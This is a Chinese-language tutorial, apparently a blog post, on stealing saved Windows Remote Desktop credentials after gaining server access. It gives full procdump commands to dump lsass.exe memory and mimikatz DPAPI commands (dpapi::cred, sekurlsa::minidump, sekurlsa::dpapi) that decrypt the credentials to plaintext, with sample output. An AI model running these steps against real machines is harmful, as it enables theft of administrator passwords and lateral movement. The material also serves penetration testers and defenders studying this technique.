當我們拿到伺服器許可權時,往往會更深層次的滲透,在建立據點的時候,往往會分析到底是橫向還是縱向,在開始之前會進行一些資訊收集,使用procdump+mimikatz可以一步到位的獲取到遠端連結憑證。
何為憑證:
在個人電腦使用mstsc進行遠端連結時會輸入所需賬戶密碼,可能有些人覺得麻煩就會選擇儲存憑證資訊,在下次連結時就不需要再次輸入使用者名稱密碼,但是此操作會在本地儲存一份憑證。如果有人進入到了該伺服器,反之:就會產生一種連鎖反應。
憑證的獲取:
在windows桌面下可以使用 procdump+mimikatz 一步到位,具體流程
1.procdump 請使用管理員許可權執行
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
先使用procdump讀取lsass.exe程式裡面的內容,lsass.exe時本地安全和遠端登入策略
得到以下回顯:
ProcDump v8.0 - Writes process dump files
Copyright (C) 2009-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
With contributions from Andrew Richards
[22:57:53] Dump 1 initiated: C:\Users\YuanHaiDesktop\Desktop\[22:57:53] Dump 1 writing: Estimated dump file size is 84 MB.
[22:57:53] Dump 1 complete: 84 MB written in 0.2 seconds
[22:57:53] Dump count reached.
會在當前目錄下產生一個lsass.dmp檔案。
2.獲取遠端憑證
這裡我用本機做的測試。先在cmd中檢視Credentials目錄下是否有儲存憑證
dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
如果有列出檔案,說明有儲存的憑證,進入%userprofile%\AppData\Local\Microsoft\Credentials\資料夾將其下載下來
注意:如果cmd中有列出檔案,但在檔案中無法看到,請在檢視選項裡取消隱藏系統檔案。
3.記錄guidMasterKey的值
將剛剛下載出來的檔案儲存在固定位置:使用mimikatz讀取
dpapi::cred /in:憑證路徑
將回顯內容裡面的guidMasterKey記錄下來,等會要用
guidMasterKey : {d44e6e16-1235-47d8-b333-a9df5a6abf93}
4.讀取MasterKey
先使用mimikatz繫結剛剛dump出來的lsass.dump
sekurlsa::minidump lsass.dmp
然後讀取裡面的內容
sekurlsa::dpapi
找到剛剛記錄下來的guidMasterKey對應的guid
記錄對應MasterKey
e684e4e6063adb32554282c44732e951df2076b3e07d857a2eb0174f68713039c01de51135af67cdd5fe87c2c8ba8c8b7c84ac950be94c82f872621401fcf034
5.解密內容,獲取遠端憑證資訊
上面獲取到了對應的GuidMasterKey和對應的MaserKey後,我們就可以進行解密
dpapi::cred /in:遠端憑證檔案地址 /masterkey:記錄下來的MasterKey
就可以得到相應的password,還是明文
TargetName : Domain:target=TERMSRV/主機地址
UnkData : (null)
Comment : (null)
TargetAlias : (null)
UserName : administrator
CredentialBlob : 密碼
Attributes : 0
本作品採用《CC 協議》,轉載必須註明作者和本文連結